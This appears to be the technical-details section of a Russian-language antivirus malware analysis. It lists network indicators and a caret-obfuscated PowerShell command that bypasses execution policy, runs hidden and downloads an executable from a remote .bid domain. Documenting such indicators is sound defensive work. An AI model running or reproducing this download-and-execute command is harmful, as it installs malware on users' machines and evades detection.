Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wer^s^hE^l^L^.eXE ^-^E^x^EC^U^TIoNPo^Li^C^Y ^B^Ypas^s -noP^RO^fIlE ^-wiN^d^oWSt^Yle h^IdDEn^ ^(n^Ew^-obJE^ct S^ysTe^m.n^E^T.w^Eb^cl^Ie^N^T)^.doWNl^o^A^DfI^l^E('http://a...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "p^o^wer^s^hE^l^L^.eXE ^-^E^x^EC^U^TIoNPo^Li^C^Y ^B^Ypas^s -noP^RO^fIlE ^-wiN^d^oWSt^Yle h^IdDEn^ ^(n^Ew^-obJE^ct S^ysTe^m.n^E^T.w^Eb^cl^Ie^N^T)^.doWNl^o^A^DfI^l^E('http://a...' (со скрытым окном)